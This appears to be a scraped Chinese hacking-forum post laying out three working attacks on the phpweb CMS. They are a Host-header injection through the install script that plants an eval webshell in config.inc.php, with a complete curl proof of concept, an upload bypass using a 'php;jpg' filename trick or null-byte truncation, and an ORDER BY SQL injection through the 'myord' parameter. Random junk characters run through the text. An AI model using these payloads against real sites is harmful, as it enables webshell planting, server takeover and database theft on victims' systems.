phpweb成品网站最新版(注入、上传、写shell)

admin

注入：
  c  P3 F; B/ ?" Y5 S0 Z
/ t8 D+ W4 R' E之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码
. B9 q$ V" w) ]1 ^" b2 ~: C- f
鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
+ H% \7 K7 j) U4 I鸡肋2： 有一定安全常识的站长都会删掉 install 目录

虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响

分析：
/ I5 k; f9 k- c3 y+ l+ B' Z

$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤

. k6 y4 w; H& S- m6 _                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
                                            $filestr=str_replace(" ","",$filestr);
                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
( s# D5 h  F8 h& A% j                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
7 \' Q* B7 \8 N$ ~- m+ n                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
) E% j. u1 p, t5 C- [+ X                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
! i( Q0 p# _0 K, ^                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

) t0 I: O9 b9 E                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
: W5 o! O9 k9 F% l9 R$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

$ L/ l( _2 {+ Y5 Xpoc：

- z- }* o1 o5 @. g" M6 _. E& F?
4 c- j. q- _/ F# `. i$ C! x" W- r/ ~1
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
shell地址: /config.inc.php
跟之前的 phpcms一样 需要远程数据库
, S  w* E( o$ I+ k: a: F
——————————————————–
上传漏洞(需要进后台)：
漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用
, \0 J5 K1 A1 F

: E% h8 j4 H1 a! ?% U<?php
    define("ROOTPATH", "../../");
    include(ROOTPATH."includes/admin.inc.php");
    NeedAuth(0);
' A1 u. Y6 P# I
    $dt=date("Ymd",time());
    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
    }

0 i% C! U9 L! ]    //文件保存目录路径
( Z: ?% [! p9 ]    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
    echo $save_path;
    //文件保存目录URL
2 D: p3 l; f" U" R0 P! p    $save_url = '../../'.$_POST['attachPath'].$dt.'/';

' X' `$ X+ [% ~' Q    //定义允许上传的文件扩展名
    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀
# d4 \6 x7 ]. W
4 A8 i7 C: ?9 I8 M( U. I    //最大文件大小
5 j+ K; k$ j$ s9 s4 `% h. Z    $max_size = 1000000;
8 l. i, N8 ]4 f6 y4 r9 ]* [& b
    //更改目录权限
    @mkdir($save_path, 0777);
7 h8 x: }5 u; n5 A- A: g) i% H
, I, P5 o' N: ]0 {& s    //文件的全部路径
    $file_path = $save_path.$_POST['fileName'];   //保存文件名

    //文件URL
    $file_url = $save_url.$_POST['fileName'];
8 ~& y0 C. P% L5 f1 d6 Q' c//有上传文件时
    if (empty($_FILES) === false) {

            //原文件名
: N& w  t* c/ V) E+ b" J  ]( h            $file_name = $_FILES['fileData']['name'];
  x/ @9 w4 Y$ \% X            //服务器上临时文件名
1 I5 M- @+ B, K7 {            $tmp_name = $_FILES['fileData']['tmp_name'];
            //文件大小
            $file_size = $_FILES['fileData']['size'];
            //检查目录
) d/ J/ |, c8 A. Y5 ^            if (@is_dir($save_path) === false) {
( j: l# ^$ f) F* _0 e                    alert("上传目录不存在。");
            }
0 _8 h0 B& f: ^- D: M            //检查目录写权限
            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
: A# R! C$ \' {* Y" h) q2 I, f            }
( ], k' \! V5 y8 ], B" A6 ^% l+ o            //检查是否已上传
            if (@is_uploaded_file($tmp_name) === false) {
                    alert("临时文件可能不是上传文件。");
+ H7 m+ R% \/ `" u) v- S            }
" e5 n) @8 y, O6 l: o            //检查文件大小
# i  p; L' D6 o- i! B0 |            if ($file_size > $max_size) {
  f/ D- z! j& d% j) k                    alert("上传文件大小超过限制。");
            }
            //获得文件扩展名
- V4 d# _9 \/ {/ ~            $temp_arr = explode(".", $_POST['fileName']);
            $file_ext = array_pop($temp_arr);
% X* c# O8 R; x# E            $file_ext = trim($file_ext);
            $file_ext = strtolower($file_ext);
; i7 P2 i- N2 l' W3 c7 q
            //检查扩展名   
            if (in_array($file_ext, $ext_arr) === false) {     
5 _$ s4 F6 g! ~. V                    alert("上传文件扩展名是不允许的扩展名。");
$ t: T8 S" }" H8 U3 @8 {& u            }
7 J- L# @4 ]9 U; p; c7 R* G# V' R
            //移动文件   
. c( o7 u5 I6 b2 [3 [            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
: G% u2 F- v6 o' C            if (move_uploaded_file($tmp_name, $file_path) === false) {
                    alert("上传文件失败。");
, g' S% z4 \  D2 s4 P            }
% e) a" u( t+ l0 j8 {/ L& v
: l9 X6 i# w) ~6 J            @chmod($file_path,0666);
( i/ O0 n5 E( M4 ^4 Y
    ?>
% m  [5 {  l2 G# @- Z) `3 Z4 [2 ^抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227
; h* q; F. U6 [- J
apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

6 [' o9 H$ I* y8 J——————————————————
注入漏洞：
漏洞文件:search/module/search.php
/search/index.php?key=1&myord=1 [sqlinjection]
; n7 Y7 ^  z# ~

& h5 Q; g! B7 Q/ D0 G9 j<?php
   //       ... 省略 n 行...
   //第18行:
           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
' X" u) V* u' _" H8 z' @           $page=htmlspecialchars($_GET["page"]);
5 O. ~( y; P3 f  V; P           $myord=htmlspecialchars($_GET["myord"]);

* ?, d7 E% n  p- D   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
4 J9 y% x6 I8 j( k  b   //第47行 $key:
2 d5 v3 D$ g3 ^  W, l$ ]4 a
   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..

   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入
$ `5 a2 s1 ]. @3 ?7 Z3 o1 V
, |! v% M5 `$ d, B  @. r$ q4 |   ?>
: G5 B& `+ O" Y; Q; v4 |2 Q